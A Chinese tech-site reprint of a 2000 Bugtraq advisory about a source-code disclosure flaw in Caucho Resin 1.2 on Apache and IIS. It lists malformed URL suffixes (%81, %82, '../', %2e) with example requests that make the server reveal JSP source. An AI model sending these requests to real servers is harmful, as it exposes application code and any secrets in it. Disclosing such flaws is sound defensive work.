繁体中文
设为首页
加入收藏
当前位置:JSP技术首页 >> 资料/其它 >> Resin 1.2 重要源代码暴露漏洞

Resin 1.2 重要源代码暴露漏洞

2005-02-15 08:00:00  作者:  来源:互联网  浏览次数:0  文字大小:【】【】【
简介:bugtraq id 1986 class Input Validation Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published November 23, 2000 updated November 23, 2000 vulnerable Caucho Technology Resin 1.2 - Microsoft I...

bugtraq id 1986

class Input Validation Error

cve GENERIC-MAP-NOMATCH

remote Yes

local Yes

published November 23, 2000

updated November 23, 2000

vulnerable Caucho Technology Resin 1.2

- Microsoft IIS 5.0

+ Microsoft Windows NT 2000

- Apache Group Apache 1.3.6win32

Apache (Win32):

..

%2e..

%81

%82

Example: http://target/filename.JSP%81

Resin Web Server:

../

Example: http://target/filename.JSP../

IIS 5 requesting the URL encoded with ASCII:

'%2' instead of '.'

Example: http://target/filename%2eJSP

责任编辑:admin
相关文章